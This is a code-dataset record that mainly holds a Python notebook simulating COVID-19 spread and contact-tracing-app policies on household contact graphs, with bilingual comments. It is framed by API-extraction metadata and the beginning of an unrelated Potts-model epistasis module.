example_correctness_test_utils import TrainingHistory, StopwatchManager\n'), ((2494, 2566), 'numpy.array', 'np.array', (['[history.acc, history.loss, history.val_acc, history.val_loss]'], {}), '([history.acc, history.loss, history.val_acc, history.val_loss])\n', (2502, 2566), True, 'import numpy as np\n'), ((1547, 1607), 'keras.layers.Embedding', 'Embedding', (['max_features', 'embedding_dims'], {'input_length': 'maxlen'}), '(max_features, embedding_dims, input_length=maxlen)\n', (1556, 1607), False, 'from keras.layers import Embedding\n'), ((1619, 1631), 'keras.layers.Dropout', 'Dropout', (['(0.2)'], {}), '(0.2)\n', (1626, 1631), False, 'from keras.layers import Dense, Dropout, Activation\n'), ((1739, 1814), 'keras.layers.Conv1D', 'Conv1D', (['filters', 'kernel_size'], {'padding': '"""valid"""', 'activation': '"""relu"""', 'strides': '(1)'}), "(filters, kernel_size, padding='valid', activation='relu', strides=1)\n", (1745, 1814), False, 'from keras.layers import Conv1D, GlobalMaxPooling1D\n'), ((1848, 1868), 'keras.layers.GlobalMaxPooling1D', 'GlobalMaxPooling1D', ([], {}), '()\n', (1866, 1868), False, 'from keras.layers import Conv1D, GlobalMaxPooling1D\n'), ((1914, 1932), 'keras.layers.Dense', 'Dense', (['hidden_dims'], {}), '(hidden_dims)\n', (1919, 1932), False, 'from keras.layers import Dense, Dropout, Activation\n'), ((1944, 1956), 'keras.layers.Dropout', 'Dropout', (['(0.2)'], {}), '(0.2)\n', (1951, 1956), False, 'from keras.layers import Dense, Dropout, Activation\n'), ((1968, 1986), 'keras.layers.Activation', 'Activation', (['"""relu"""'], {}), "('relu')\n", (1978, 1986), False, 'from keras.layers import Dense, Dropout, Activation\n'), ((2075, 2083), 'keras.layers.Dense', 'Dense', (['(1)'], {}), '(1)\n', (2080, 2083), False, 'from keras.layers import Dense, Dropout, Activation\n'), ((2095, 2116), 'keras.layers.Activation', 'Activation', (['"""sigmoid"""'], {}), "('sigmoid')\n", (2105, 2116), False, 'from keras.layers import Dense, Dropout, Activation\n')]
from IPython import get_ipython # %% #################### # GRAPH GENERATION # #################### # TODO: remove duplicate of nbIndividuals in viz nbIndividuals = 1000 # number of people in the graph | nombre d'individus dans le graphe initHealthy = 0.85 # proportion of healthy people at start | la proportion de personnes saines à l'intant initial initCured = 0.1 # proportion of cured people at start | proportion de personnes guéries à l'instant initial # The other people are 60% presymptomatic and 40% asymptomatic at start | Les autres personnes sont 40% d'asymptomatiques et 60% de présymptomatiques au départ # graph generation for exponential degrees distribution #------------------------------------------------------ deg_avg = 100 # average number of connexions per person | le nombre moyen de connexions par personne av_household_size = 6 # average size of household | la taille moyenne d'un foyer household_proba = 1 # probability of meeting a person of the same household | la probabilité de contact par jour entre membres d'un même foyer extern_contact_proba = 0.3 # probabilty of meeting a person of a different household | la probabilité de contact par jour entre personne de foyers différents # average contacts per day = 0.3*(100-6) + 1*6 = 34.2 # graph generation with organization in households #------------------------------------------------- household_size = (3, 5) # min and max size of an household (uniform distribution) | extremums de la taille d'un foyer household_link = 1 # probability of contact between members of a household | proba de contact entre membres d'un foyer number_of_households = 300 # 2500 is good but a bit slow | number of households in the community | nombre de foyers dans une communauté community_link = 0.3 # probability of contact across households | proba de contact entre foyers av_deg_by_household = 400 # number of link from a household | nombre moyen de liens depuis un foyer # average external degree of an individual : 400/4 (4 is the average size of an household) # average contacts per day = (400/4)*0.3 + 4 = 34 ############## # APP PARAMS # ############## daysNotif = 0 # number of days the app checks back for contact notification | nombre de jours vérifiés par l'appli pour notifier un contact utilApp = 0.8 # percentage of people having the app | la proportion d'utilisateurs de l'application dans la population générale pDetection = 0.9 # prob. that the app detects a contact | proba que l'appli détecte un contact pReport = 0.9 # prob. that a user reports his symptoms | proba qu'un utilisateur alerte de ses symptômes pReadNotif = 0.8 # probablity of taking a notification into account (ask for a test, quarantine) | proba de prendre en compte une notification (demande de test, quarantaine) pSymptomsNotCovid = 0.005 # every day, everyone sends a notification with prob. pSymptomsNotCovid | chaque jour, tout le monde envoie une notif avec proba PSymptomsNotCovid ############ # POLICIES # ############ # people warn the app immediately after having symptoms | on prévient l'application directement après avoir développé les symptômes warningAfterSymptoms = False # upon notification, an individual asks for a test (with some prob.) # if true, user waits for test results in quarantine, else he goes in quarantine only upon reception of positive test results # | # à la reception d'une notif, l'utilisateur demande un test (avec une certaine proba) # si vrai, il attend les résultats en quarantaine, sinon il ne se met en quarantaine qu'aux résultats d'un test positif quarantineAfterNotification = True ############### # TEST PARAMS # ############### testWindow = (3, 10) # tests are only effective in a given window (time since infection) | les tests ne sont efficaces que dans une fenêtre de temps après infection daysUntilResult = 2 # attente pour l'obtention des résultats pFalseNegative = 0.15 # prob. of false negative | proba d'avoir un faux négatif daysBetweenTests = 0 ############## # QUARANTINE # ############## pQSymptoms = 0.9 # probability of going into quarantine when one has symptoms | proba de confinement lors de détection des symptômes quarantineFactor = 100 # reduction factor applied to the probabilities when one is in quarantine | réduction des probas de rencontre lors du confinement daysQuarantine = 14 # duration of the quarantine | durée de la quarantaine ################# # PROBABILITIES # ################# # !! Probabilities are given for 1 step of the process, thus overall prob. follows a geometric law for which expected values have been calculated # paramters estimated -> a limit of the model pCloseContact = 0.375 # prob. that a contact is a close contact (those detected by the app) | proba qu'un contact soit rapproché (ceux détectés par l'appli) pContaminationCloseContact = 0.02 # prob. of contamination after close contact with an infected person | proba de contamination après contact rapproché avec qqn d'infecté #according to https://www.who.int/docs/default-source/coronaviruse/who-china-joint-mission-on-covid-19-final-report.pdf -> around 1 to 5% of close contact lead to virus transmission pContaminationCloseContactAsymp = 0.006 # infectiousness of asymptomatic people appears to be very low according to [4] and "Temporal dynamics in viral shedding and transmissibility of COVID-19" [6] pContaminationFar = 0.001 # prob. of contamination upon non close contact (environmental or short contact) | proba de contamination par contact environnemental ou bref pContaminationFarAsymp = 0.0003 # we took R0=2 estimate from [4] and : 34 contacts/day, an average time of infectiousness of 10 days (pre symptomatic + begining of symptoms period) #average number of infected by symptomatic : (0.375*0.02+0.625*0.001)*34*10 = 2.76 #average number of infected by asymptomatic : (0.375*0.006+0.625*0.0003)*34*10 = 0.83 # this gives 0.6*2.76 + 0.4*0.83 = 1.99 persons infected in average by an infected # this is plausible given the estimate of R0 and the fact that asymptomatic contamination appears to be minor # [4] and [6] # and (0.6*0.625*0.001 + 0.4*0.625*0.0003)*34*10 / R0 = 0.0765 -> the proportion of contaminations which are not due to close contact (environmental / short contact) (contaminations by asymptomatic people are neglected) estimated according to environmental contamination estimate in [4] # thus most infections (92%) are susceptible to be noticed by the app # -> the proportion of contaminations by asympt. people is : 0.4*0.83/(0.6*2.76 + 0.4*0.0.83) = 0.17 plausible according to the presumed low infectiosity shown in [4], but this is a conservative estimate (not the 0.06 given by this paper) given the high uncertainty around the results pAsympt = 0.4 # probability of being asymptomatic when infected | proba qu'une personne infectée soit asymptomatique # according to [4] and Diamond Princess estimates # parameters for the lognormal law of the incubation period | paramètres pour la loi lognormale de la période d'incubation incubMeanlog = 1.644 # -> ~5.5 days incubSdlog = 0.363 # -> ~2.1 days # according to [4] pAtoG = 0.1 # probability of going from asymptomatic state to cured | proba de passer de asymptomatique à guéri # according to "Clinical characteristics of 24 asymptomatic infections with COVID-19 screened among close contacts in Nanjing, China" [7] pIStoC = 0.07 # probability of going from symptomatic state to cured | proba de passer de avec symptômes à gueri pIStoD = 0.003 # probability of dying when symptomatic | proba de décès d'une personne présentant des symptômes # average time with symptoms : 1/(0.07+0.003) = 13.7 days : plausible according to [4] # death rate when symptoms : 0.003/0.07 = 4.3% : plausible in France according to estimate of 1.6M cases with symptoms and 6 000 deaths the 3 April # https://www.mgfrance.org/publication/communiquepresse/2525-enquete-mg-france-plus-d-un-million-et-demi-de-personnes-prises-en-charge-par-leur-medecin-generaliste-pour-le-covid-19-entre-le-17-mars-et-le-3-avril # # Libs and defs # Librairies import random import numpy as np # -> sliders from ipywidgets import interact, interactive, fixed, interact_manual import ipywidgets as widgets HEALTHY = 0 ASYMP = 1 PRESYMP = 2 SYMP = 3 CURED = 4 DEAD = 5 class Graph: """ Object holding the representation of the graph and some metrics """ def __init__(self): self.individuals = [] self.adj = [] self.encounters = [[[] for day in range(daysNotif)] for individual in range(nbIndividuals)] self.nbHealthy = 0 # number of healthy people self.nbAS = 0 # number of asymptomatic people self.nbPS = 0 # number of premptomatic people self.nbS = 0 # number of symptomatic people self.nbCured = 0 # number of cured persons self.nbDead = 0 # number of deceased people self.nbQuarantineI = 0 # number of infected people in quarantine self.nbQuarantineNonI = 0 # number of non infected people in quarantine self.nbTest = 0 # number of tests made # cumulative counters : self.nbQuarantineTotal = 0 # number of people in quarantine self.nbInfectedByASPS = 0 # number of people infected by asymp. + presymp. people #to compute Rt self.stepNb = 0 self.contaminations = [] # number of people contaminated at a given time self.numInfectedByNewInfected = [] # total number of people who will get infected by people contaminated at a given time class Individual: """ Object holding the representation of an individual """ def __init__(self, state, daysQuarantine, app, sentNotification, daysIncubation, timeSinceInfection, timeLeftForTestResult): self.state = state self.daysQuarantine = daysQuarantine self.app = app self.sentNotification = sentNotification self.daysIncubation = daysIncubation self.timeSinceInfection = timeSinceInfection self.timeSinceLastTest = np.inf # we don't want to test people too often self.timeLeftForTestResult = timeLeftForTestResult self.nbInfected = 0 def in_state(self, state): return self.state == state def is_infected(self): return self.state in [PRESYMP, ASYMP, SYMP] def has_no_covid(self): return self.state in [HEALTHY, CURED] def in_quarantine(self): return self.daysQuarantine > 0 def go_quarantine(self): if self.daysQuarantine <= 0: self.daysQuarantine = daysQuarantine # goes into quarantine if isn't already # # Graph generation def create_individuals(graph): graph.contaminations.append(0) for i in range(nbIndividuals): app = False if random.uniform(0,1) < utilApp: app = True s = PRESYMP time_since_infection = -1 incub = 0 r = random.random() if r < initHealthy: s = HEALTHY graph.nbHealthy += 1 elif r < initHealthy + initCured: s = CURED graph.nbCured += 1 else: graph.contaminations[0] += 1 # we start as if a proportion of the population just got infected time_since_infection = 0 if random.random() < pAsympt: s = ASYMP graph.nbAS += 1 else: s = PRESYMP incub = round(np.random.lognormal(incubMeanlog, incubSdlog)) graph.nbPS += 1 # state, quarantine, app, notif, incubation, timeSinceInfection, timeLeftForTestResult graph.individuals.append(Individual(s, 0, app, False, incub, time_since_infection, -1)) def init_graph_exp(graph): """ Graph initialisation based on exponential ditribution of degrees """ create_individuals(graph) # affecting degrees to vertices degrees = np.around(np.random.exponential(deg_avg, nbIndividuals)) # to get an even number of total degrees S = sum(degrees) if S%2 == 1: degrees[0] += 1 S += 1 graph.adj = [[] for i in range(nbIndividuals)] while S > 0: # creating an edge [p1, p2] = np.random.choice(len(degrees), 2, replace=False, p=degrees/S) if degrees[p1] <= av_household_size or degrees[p2] <= av_household_size: # the last edges created are edges within households graph.adj[p1].append({"node" : p2, "proba" : household_proba}) graph.adj[p2].append({"node" : p1, "proba" : household_proba}) else: graph.adj[p1].append({"node" : p2, "proba" : extern_contact_proba}) graph.adj[p2].append({"node" : p1, "proba" : extern_contact_proba}) degrees[p1] -= 1 degrees[p2] -= 1 S -= 2 def init_graph_household(graph): """ Graph generation based on households organisation """ global nbIndividuals # creation of the households graph.adj = [] for i in range(number_of_households): size = random.randint(household_size[0], household_size[1]) nb = len(graph.adj) for i in range(nb, nb+size): household = [] for j in range(nb, nb+size): if (i != j): household.append({"node": j, "proba": household_link}) graph.adj.append(household) # linkage of the households for i in range(av_deg_by_household*number_of_households): [p1, p2] = np.random.choice(len(graph.adj), 2, replace=False) graph.adj[p1].append({"node": p2, "proba": community_link}) graph.adj[p2].append({"node": p1, "proba": community_link}) nbIndividuals = len(graph.adj) create_individuals(graph) graph.encounters = [[[] for day in range(daysNotif)] for individual in range(nbIndividuals)] # # Updating the graph def contamination(graph, i, j, closeContact): """ Individuals i and j have come into contact, leading to a possible contamination | Les individus i et j sont entrés en contact, une contamination est possible """ if graph.individuals[i].state == graph.individuals[j].state: return if graph.individuals[i].in_state(HEALTHY): contamination(graph, j, i, closeContact) return # i is the infected individual if graph.individuals[i].is_infected(): if graph.individuals[j].in_state(HEALTHY): if closeContact: pContamination = pContaminationCloseContact pContaminationAsymp = pContaminationCloseContactAsymp else: pContamination = pContaminationFar pContaminationAsymp = pContaminationFarAsymp if (random.random() < pContamination and (not graph.individuals[i].in_state(ASYMP))) or \ (random.random() < pContaminationAsymp and graph.individuals[i].in_state(ASYMP)): # j becomes infected # for Rt computation graph.contaminations[graph.stepNb] += 1 graph.numInfectedByNewInfected[graph.stepNb - graph.individuals[i].timeSinceInfection] += 1 # parent infection took place timeSinceInfection ago if graph.individuals[i].in_state(ASYMP) or graph.individuals[i].in_state(PRESYMP): graph.nbInfectedByASPS += 1 graph.individuals[j].timeSinceInfection = 0 graph.individuals[i].nbInfected += 1 # i has infected one more person graph.nbHealthy -= 1 if random.random() < pAsympt: graph.individuals[j].state = ASYMP graph.nbAS += 1 else: graph.individuals[j].state = PRESYMP graph.individuals[j].daysIncubation = round(np.random.lognormal(incubMeanlog, incubSdlog)) graph.nbPS += 1 def test_individual(individual, graph): # if there is a test incoming, the person is not tested again if individual.timeLeftForTestResult >= 0 or individual.in_state(DEAD): return # the person was tested not long ago if individual.timeSinceLastTest < daysBetweenTests: return # the person is tested individual.timeSinceLastTest = 0 graph.nbTest += 1 individual.timeLeftForTestResult = daysUntilResult if individual.has_no_covid(): individual.latestTestResult = False # we assume that there are no false positives return if individual.timeSinceInfection < testWindow[0] or individual.timeSinceInfection > testWindow[1]: individual.latestTestResult = False # not in the detection window, the test fails return # otherwise the person is ill # the test result depends whether we have a false negative or not individual.latestTestResult = not (random.random() < pFalseNegative) def send_notification(graph, i): """ Send notification to people who have been in touch with i | Envoi d'une notif aux personnes ayant été en contact avec i """ if graph.individuals[i].sentNotification: return # notifications already sent graph.individuals[i].sentNotification = True for daysEncounter in graph.encounters[i]: # note: graph.encounter[i] is empty if i does not have the app so there is no need to have an additional condition for contact in daysEncounter: if random.random() < pReadNotif: # if the person takes the notification into account # the person is always tested (TODO: change this ?) test_individual(graph.individuals[contact], graph) # asks for a test if quarantineAfterNotification: # in this case, the person waits for test results in quarantine graph.individuals[contact].go_quarantine() def make_encounters(graph, i): """ Assess all encounters made by i in one day | Détermine toutes les rencontres faites par i en un jour """ for edge in graph.adj[i]: j = edge['node'] if j < i: continue # only check one way of the edge | on ne regarde qu'un sens de chaque arête # if i and/or j are in quarantine, reduce the probability that they meet | si i et/ou j sont confinés, réduction de leur proba de rencontre factor = 1 if graph.individuals[i].in_quarantine(): factor *= quarantineFactor if graph.individuals[j].in_quarantine(): factor *= quarantineFactor if random.random() < edge['proba'] / factor: if random.random() < pCloseContact: # if this is a close contact # if i and j have the app, we save their encounter | si i et j ont l'appli, on note la rencontre if graph.individuals[i].app and graph.individuals[j].app and random.random() < pDetection: # contact detections are symmetric in our model graph.encounters[i][-1].append(j) graph.encounters[j][-1].append(i) contamination(graph, i, j, True) else: contamination(graph, i, j, False) def step(graph): """ Step from a day to the next day | Passage au jour suivant du graphe """ graph.nbTest = 0 for encounter in graph.encounters: encounter.append([]) # will contain every encounter of the day | contiendra les nouvelles rencontres du jour graph.contaminations.append(0) graph.numInfectedByNewInfected.append(0) ## go through each possible encounter | on constate toutes les rencontres entre individus for i in range(nbIndividuals): make_encounters(graph, i) ## update the states | on met à jour les états des individus for i, individual in enumerate(graph.individuals): if individual.in_state(ASYMP): if random.random() < pAtoG: graph.nbAS -= 1 graph.nbCured += 1 individual.state = CURED elif individual.in_state(PRESYMP): if individual.daysIncubation == 0: # the person develops symptoms graph.nbPS -= 1 graph.nbS += 1 individual.state = SYMP # send the notifications (encounters[i] is empty if i doesn't have the app) | envoi des notifs (encounters[i] vide si i n'a pas l'appli) if random.random() < pReport and warningAfterSymptoms: send_notification(graph, i) if random.random() < pQSymptoms: # go into quarantine if symptoms appear | mise en confinement à la détection des symptômes individual.go_quarantine() test_individual(individual, graph) # all individuals developing symptoms are tested (TODO: add prob. to parameters ?) elif individual.in_state(SYMP): action = random.random() if action < pIStoC: graph.nbS -= 1 graph.nbCured += 1 individual.state = CURED elif action > 1 - pIStoD: graph.nbS -= 1 graph.nbDead += 1 individual.state = DEAD # if warningAfterSymptoms is True, each individual has a probability of sending a false notification due to symptoms that are misinterpreted as from COVID-19 # | si warningAfterSymptoms est vrai, chaque individu a une probabilité d'envoyer une notification en raison de symptômes faussement perçus comme relevant du COVID-19 if warningAfterSymptoms and random.random() < pSymptomsNotCovid: send_notification(graph, i) # reception of test results | réception des résultats de test if individual.timeLeftForTestResult == 0: if individual.in_quarantine() and individual.latestTestResult == False: # is in quarantine and gets a negative test individual.daysQuarantine = 0 # end of quarantine if individual.latestTestResult == True: individual.go_quarantine() individual.timeLeftForTestResult = np.inf # people tested positive are not tested again if random.random() < pReport: # not everyone reports a positive test to the app send_notification(graph, i) individual.app = False # unsubscribe from the app in order to not consider new notifications individual.timeLeftForTestResult -= 1 ## results of the day | bilan du jour graph.nbQuarantineNonI = 0 graph.nbQuarantineI = 0 for individual in graph.individuals: if individual.in_state(DEAD): continue individual.daysQuarantine -= 1 individual.daysIncubation -= 1 individual.timeSinceLastTest += 1 # if there are still symptoms we don't end the quarantine if (not individual.in_quarantine()) and individual.in_state(SYMP): individual.daysQuarantine = 1 if individual.in_quarantine(): graph.nbQuarantineTotal += 1/nbIndividuals if not individual.is_infected(): graph.nbQuarantineNonI += 1 else: graph.nbQuarantineI += 1 if individual.timeSinceInfection >= 0: individual.timeSinceInfection += 1 ## deleting oldest recorded day | suppression du plus vieux jour de l'historique for encounter in graph.encounters: encounter.pop(0) graph.stepNb += 1 # # Display # Interactive model below (it takes about 10-15 sec to appear and to run a simulation) # ! uncomment for the notebook version : # %matplotlib notebook import matplotlib.pyplot as plt fig, ((ax, ax2), (ax3, ax4)) = plt.subplots(2, 2, figsize=[15,10]) axRt = ax3.twinx() xs = [] y_D = [] y_MS = [] y_MPS = [] y_MAS = [] y_S = [] y_G = [] y_Q = [] y_InfectByASPS = [] y_QuarantineNonI = [] y_QuarantineI = [] y_QuarantineNonITotal = [] y_Test = [] y_TestTotal = [] y_Rt = [] ax.set_ylim([0, nbIndividuals]) def update_viz(graph): if y_QuarantineNonITotal != []: y_QuarantineNonITotal.append((graph.nbQuarantineNonI + nbIndividuals*y_QuarantineNonITotal[-1])/nbIndividuals) y_TestTotal.append((graph.nbTest + nbIndividuals*y_TestTotal[-1])/nbIndividuals) else: y_QuarantineNonITotal.append(graph.nbQuarantineNonI/nbIndividuals) y_TestTotal.append(graph.nbTest/nbIndividuals) xs.append(len(xs)) y_D.append(graph.nbDead/nbIndividuals*100) y_MS.append(graph.nbS/nbIndividuals*100) y_MPS.append(graph.nbPS/nbIndividuals*100) y_MAS.append(graph.nbAS/nbIndividuals*100) y_S.append(graph.nbHealthy/nbIndividuals*100) y_G.append(graph.nbCured/nbIndividuals*100) y_Q.append(graph.nbQuarantineTotal) y_InfectByASPS.append(graph.nbInfectedByASPS) y_QuarantineNonI.append(graph.nbQuarantineNonI/nbIndividuals*100) y_QuarantineI.append(graph.nbQuarantineI/nbIndividuals*100) y_Test.append(graph.nbTest/nbIndividuals*100) def draw_viz(graph): ax.clear() ax2.clear() ax3.clear() ax4.clear() axRt.clear() ax.set_xlabel("Days") ax2.set_xlabel("Days") ax3.set_xlabel("Days") ax4.set_xlabel("Days") # computing Rt | calcul de Rt for i in range(graph.stepNb): if graph.contaminations[i] != 0 and graph.contaminations[i] > 5: # we just take into account days where there were more than 5 contaminations to reduce random fluctuations y_Rt.append(graph.numInfectedByNewInfected[i]/graph.contaminations[i]) else: y_Rt.append(0) for i in range(1, graph.stepNb-1): # smoothing Rt curve if y_Rt[i] == 0: y_Rt[i] = (y_Rt[i-1] + y_Rt[i+1])/2 labels = [ "Symptomatic", "Deceased", "Asymptomatic","Presymptomatic", "Cured", "Healthy"] ax.stackplot(xs, y_MS, y_D, y_MAS,y_MPS, y_G, y_S, labels=labels, edgecolor="black", colors=["red", "darkred", "orange","yellow", "dodgerblue", "mediumseagreen"]) ax.set_ylabel("Proportion of the population") labels2 = ["In quarantine and non infected (percentage)", "In quarantine and infected (percentage)"] ax2.stackplot(xs, y_QuarantineNonI, y_QuarantineI, labels=labels2) ax2.set_ylabel("Proportion of the population") #line, = ax3.plot(xs, y_InfectByASPS) #line.set_label("Total infections by asympt.") ax3.set_ylabel("Quarantine days / Tests") line, = ax3.plot(xs, y_Q) line.set_label("Cumulative quarantine days per person") line, = ax3.plot(xs, y_QuarantineNonITotal) line.set_label("Cumulative quarantine days of healthy people per person") line, = ax3.plot(xs, y_TestTotal) line.set_label("Cumulative number of tests per person") axRt.set_ylabel("Rt", color = 'red') line, = axRt.plot(xs, y_Rt, color = 'red') line.set_label("Rt (average number of infections caused by one infected)") line, = ax4.plot(xs, y_Test) line.set_label("Number of tests (in percentage of population)") ax4.set_ylabel("Tests") ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.15), shadow=True, ncol=3) ax2.legend(loc='upper center', bbox_to_anchor=(0.5, -0.15), shadow=True, ncol=1) #ax3.legend(loc='upper center', bbox_to_anchor=(0.5, -0.15), shadow=True, ncol=1) ax3.legend(loc='upper center', bbox_to_anchor=(0.5, -0.15), shadow=True, ncol=2) #axRt.legend(loc='upper center', bbox_to_anchor=(0.5, -0.15), shadow=True, ncol=1) #to avoid legend on top of the other ax4.legend(loc='upper center', bbox_to_anchor=(0.5, -0.15), shadow=True, ncol=2) plt.tight_layout() def update_prob(app_use_rate, report_to_app, read_notif, warning_after_symptoms, quarantine_after_notification): global nbIndividuals global utilApp global pReport global pReadNotif global quarantineAfterNotification global warningAfterSymptoms global xs, y_D, y_MS, y_MPS, y_MAS, y_S, y_G, y_Q, y_InfectByASPS, y_Rt global y_QuarantineNonI, y_QuarantineNonITotal, y_QuarantineI, y_Test, y_TestTotal # TODO: clarify/simplify ? utilApp = app_use_rate pReport = report_to_app pReadNotif = read_notif warningAfterSymptoms = warning_after_symptoms quarantineAfterNotification = quarantine_after_notification nbSteps = 60 nbIndividuals = 4000 # you may change the number of individuals for the exponential distribution graph here graph = Graph() init_graph_household(graph) # default graph generation using households structure, as shown in the Results section # uncomment this to get a graph with degrees following an exponential distribution #init_graph_exp(graph) xs.clear() y_D.clear() y_MS.clear() y_MPS.clear() y_MAS.clear() y_S.clear() y_G.clear() y_Q.clear() y_InfectByASPS.clear() y_QuarantineNonI.clear() y_QuarantineNonITotal.clear() y_QuarantineI.clear() y_Test.clear() y_TestTotal.clear() y_Rt.clear() maxSymp = 0 for step_ind in range(nbSteps): # update matplotlib update_viz(graph) # update simulation step(graph) print(f'Progress : {(100*step_ind/nbSteps):.1f} %') maxSymp = max(maxSymp, graph.nbS) # print("Total individuals:", nbIndividuals) # print("Number of deceased:", graph.nbDead) # print("Max. nb of symptomatic people:", maxSymp) # print("Test per people:", y_TestTotal[-1]) # print("Final healthy:", y_S[-1]) print(maxSymp/nbIndividuals,",", y_S[-1],",", y_Q[-1], ",", y_TestTotal[-1]) draw_viz(graph) plt.show() update_prob(utilApp, pReport, pReadNotif, warningAfterSymptoms, quarantineAfterNotification) # interact_manual(update_prob, \ # app_use_rate = widgets.FloatSlider(min=0.0, max=1.0, step=0.01, value=utilApp), \ # report_to_app = widgets.FloatSlider(min=0.0, max=1.0, step=0.01, value=pReport), \ # read_notif = widgets.FloatSlider(min=0.0, max=1.0, step=0.01, value=pReadNotif), \ # warning_after_symptoms = widgets.Checkbox(value=warningAfterSymptoms), \ # quarantine_after_notification = widgets.Checkbox(value=quarantineAfterNotification))
[ "matplotlib.pyplot.show", "random.randint", "random.uniform", "numpy.random.exponential", "matplotlib.pyplot.subplots", "random.random", "matplotlib.pyplot.tight_layout", "numpy.random.lognormal" ]
[((23541, 23577), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)', '(2)'], {'figsize': '[15, 10]'}), '(2, 2, figsize=[15, 10])\n', (23553, 23577), True, 'import matplotlib.pyplot as plt\n'), ((27386, 27404), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (27402, 27404), True, 'import matplotlib.pyplot as plt\n'), ((29363, 29373), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (29371, 29373), True, 'import matplotlib.pyplot as plt\n'), ((10860, 10875), 'random.random', 'random.random', ([], {}), '()\n', (10873, 10875), False, 'import random\n'), ((11860, 11905), 'numpy.random.exponential', 'np.random.exponential', (['deg_avg', 'nbIndividuals'], {}), '(deg_avg, nbIndividuals)\n', (11881, 11905), True, 'import numpy as np\n'), ((12973, 13025), 'random.randint', 'random.randint', (['household_size[0]', 'household_size[1]'], {}), '(household_size[0], household_size[1])\n', (12987, 13025), False, 'import random\n'), ((10722, 10742), 'random.uniform', 'random.uniform', (['(0)', '(1)'], {}), '(0, 1)\n', (10736, 10742), False, 'import random\n'), ((16756, 16771), 'random.random', 'random.random', ([], {}), '()\n', (16769, 16771), False, 'import random\n'), ((18402, 18417), 'random.random', 'random.random', ([], {}), '()\n', (18415, 18417), False, 'import random\n'), ((17320, 17335), 'random.random', 'random.random', ([], {}), '()\n', (17333, 17335), False, 'import random\n'), ((18459, 18474), 'random.random', 'random.random', ([], {}), '()\n', (18472, 18474), False, 'import random\n'), ((19710, 19725), 'random.random', 'random.random', ([], {}), '()\n', (19723, 19725), False, 'import random\n'), ((21401, 21416), 'random.random', 'random.random', ([], {}), '()\n', (21414, 21416), False, 'import random\n'), ((11229, 11244), 'random.random', 'random.random', ([], {}), '()\n', (11242, 11244), False, 'import random\n'), ((15466, 15481), 'random.random', 'random.random', ([], {}), '()\n', (15479, 15481), False, 'import random\n'), ((20725, 20740), 'random.random', 'random.random', ([], {}), '()\n', (20738, 20740), False, 'import random\n'), ((22013, 22028), 'random.random', 'random.random', ([], {}), '()\n', (22026, 22028), False, 'import random\n'), ((11390, 11435), 'numpy.random.lognormal', 'np.random.lognormal', (['incubMeanlog', 'incubSdlog'], {}), '(incubMeanlog, incubSdlog)\n', (11409, 11435), True, 'import numpy as np\n'), ((14640, 14655), 'random.random', 'random.random', ([], {}), '()\n', (14653, 14655), False, 'import random\n'), ((14743, 14758), 'random.random', 'random.random', ([], {}), '()\n', (14756, 14758), False, 'import random\n'), ((15727, 15772), 'numpy.random.lognormal', 'np.random.lognormal', (['incubMeanlog', 'incubSdlog'], {}), '(incubMeanlog, incubSdlog)\n', (15746, 15772), True, 'import numpy as np\n'), ((18711, 18726), 'random.random', 'random.random', ([], {}), '()\n', (18724, 18726), False, 'import random\n'), ((20360, 20375), 'random.random', 'random.random', ([], {}), '()\n', (20373, 20375), False, 'import random\n'), ((20241, 20256), 'random.random', 'random.random', ([], {}), '()\n', (20254, 20256), False, 'import random\n')]
# coding=utf-8 # Copyright 2021 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from collections import Counter import itertools from typing import Optional, Iterable, Tuple, List import numpy as np import potts_model import utils def combine_k_rounds(num_rounds: int, mutations: Iterable[Tuple[Tuple[int, int], ...]]) -> List[Tuple[Tuple[int, int], ...]]: """Return the result of combining `mutations` for `num_rounds`. Starting with a pool of M `mutations` m_1 ... m_M, stack them for K=`num_rounds` rounds. For example, for K=3 rounds of combination, this will result in every variant (m_i + m_j + m_k), for i, j, k \\in M. Be careful of memory usage, as this can be very large due to combinatorial possibilities. In the best case, this scales with {M \\choose K}. But if mutations overlap at P positions, combining them produces 1 + 2^{P} variants. So in the worst case, this will produce {M \\choose K} * 2^{P} variants. See the definition for `utils.merge_mutation_sets` for more on mutation merging. Args: num_rounds: The number of rounds of combination mutations: The starting pool of mutations, where each mutation is an iterable of tuples encoding mutations (position, mutation). Returns: A list of tuples of mutations, where each element will be a combination of `num_rounds` mutations from `mutations`. Note that each tuple will possibly be of different lengths. """ if num_rounds == 0: return list(mutations) mutation_combinations = itertools.combinations(mutations, num_rounds + 1) all_samples = [] for mutation_combination in mutation_combinations: all_samples.extend(utils.merge_multiple_mutation_sets(mutation_combination)) return all_samples def filter_mutation_set_by_position(mutation_sets: Iterable[Tuple[Tuple[int, int], ...]], limit: int = 10): """Return a filtered mutation set, where each position is used a maximum of `limit` times.""" filtered_mutation_sets = [] position_counter = Counter() for mutation_set in mutation_sets: positions = [m[0] for m in mutation_set] if any([position_counter[position] >= limit for position in positions]): continue else: position_counter.update(positions) filtered_mutation_sets.append(mutation_set) return filtered_mutation_sets def get_epistatic_seqs_for_landscape(landscape: potts_model.PottsModel, distance: int, n: int, adaptive: bool = True, max_reuse: Optional[int] = None, top_k: Optional[int] = None, random_state: np.random.RandomState = np.random.RandomState(0) ) -> List[np.ndarray]: """Return `n` variants at `distance` that are enriched for epistasis on `landscape`. To construct epistatic sequences, the top epistatic pairs are taken directly from the landscape epistasis tensor, and used as building blocks for higher order mutants. If `max_reuse` is set, the top epistatic pairs are filtered greedily to only reuse the same positions `max_reuse` times. Args: landscape: The landscape. distance: The number of mutations from the landscape wildtype. Raises a ValueError if not an even number. n: The number of variants in the test set. adaptive: When True (False), return sequences enriched for adaptive (deleterious) epistasis max_reuse: An integer indicating the maximum number of times a position can be reused in the starting pool of epistatic pairs. top_k: The number of highest magnitude interactions to use for sampling. All epistatic pairs included in the resulting variants are guaranteed to be within the `top_k` highest magnitude. random_state: An instance of np.random.RandomState Return: A List of sequences. """ if distance % 2 != 0: raise ValueError('Odd distance not supported.') if not top_k: top_k = n mutation_pairs = 